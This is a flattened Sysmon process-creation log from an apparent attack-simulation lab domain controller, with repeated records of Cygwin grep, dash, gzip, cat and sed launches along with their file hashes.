14:55:54.989{A8622C2F-53FA-6078-B608-00000000AE01}6968C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-B308-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047592Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.989{A8622C2F-53FA-6078-B508-00000000AE01}3156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047573Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.981{A8622C2F-53FA-6078-B408-00000000AE01}6196C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-B208-00000000AE01}6336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047572Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.981{A8622C2F-53FA-6078-B308-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047560Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.974{A8622C2F-53FA-6078-B208-00000000AE01}6336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047548Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.966{A8622C2F-53FA-6078-B108-00000000AE01}3420C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-B008-00000000AE01}1628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047537Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.959{A8622C2F-53FA-6078-B008-00000000AE01}1628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047525Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.951{A8622C2F-53FA-6078-AF08-00000000AE01}3368C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-AD08-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047507Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.943{A8622C2F-53FA-6078-AE08-00000000AE01}2408C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-AB08-00000000AE01}4288C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047505Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.943{A8622C2F-53FA-6078-AD08-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047487Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.936{A8622C2F-53FA-6078-AC08-00000000AE01}5952C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-AA08-00000000AE01}3008C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047485Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.936{A8622C2F-53FA-6078-AB08-00000000AE01}4288C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047472Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.928{A8622C2F-53FA-6078-AA08-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047460Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.921{A8622C2F-53FA-6078-A908-00000000AE01}6440C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-A808-00000000AE01}3208C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047450Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.914{A8622C2F-53FA-6078-A808-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047437Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.905{A8622C2F-53FA-6078-A708-00000000AE01}5640C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-A508-00000000AE01}6456C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.897{A8622C2F-53FA-6078-A608-00000000AE01}5144C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-A308-00000000AE01}5832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047417Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.897{A8622C2F-53FA-6078-A508-00000000AE01}6456C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047399Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.890{A8622C2F-53FA-6078-A408-00000000AE01}2664C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-A208-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047397Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.890{A8622C2F-53FA-6078-A308-00000000AE01}5832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047385Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.883{A8622C2F-53FA-6078-A208-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.875{A8622C2F-53FA-6078-A108-00000000AE01}5444C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-A008-00000000AE01}5964C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047362Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.867{A8622C2F-53FA-6078-A008-00000000AE01}5964C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047350Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.859{A8622C2F-53FA-6078-9F08-00000000AE01}2084C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-9D08-00000000AE01}924C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047332Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.851{A8622C2F-53FA-6078-9E08-00000000AE01}3420C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-9B08-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047330Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.851{A8622C2F-53FA-6078-9D08-00000000AE01}924C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047311Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.844{A8622C2F-53FA-6078-9C08-00000000AE01}3368C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-9A08-00000000AE01}5404C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.844{A8622C2F-53FA-6078-9B08-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047297Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.836{A8622C2F-53FA-6078-9A08-00000000AE01}5404C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.828{A8622C2F-53FA-6078-9908-00000000AE01}5052C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-9808-00000000AE01}3136C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047275Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.821{A8622C2F-53FA-6078-9808-00000000AE01}3136C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047262Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.812{A8622C2F-53FA-6078-9708-00000000AE01}1140C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-9508-00000000AE01}6808C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047244Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.804{A8622C2F-53FA-6078-9608-00000000AE01}6440C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-9308-00000000AE01}2952C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047242Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.804{A8622C2F-53FA-6078-9508-00000000AE01}6808C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047223Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.797{A8622C2F-53FA-6078-9408-00000000AE01}6452C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-9208-00000000AE01}4604C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047222Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.797{A8622C2F-53FA-6078-9308-00000000AE01}2952C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047210Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.790{A8622C2F-53FA-6078-9208-00000000AE01}4604C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047198Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.782{A8622C2F-53FA-6078-9108-00000000AE01}5184C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-9008-00000000AE01}616C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047188Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.775{A8622C2F-53FA-6078-9008-00000000AE01}616C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047175Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.766{A8622C2F-53FA-6078-8F08-00000000AE01}4160C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-8D08-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047157Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.759{A8622C2F-53FA-6078-8E08-00000000AE01}5444C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-8B08-00000000AE01}3220C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047155Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.758{A8622C2F-53FA-6078-8D08-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047137Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 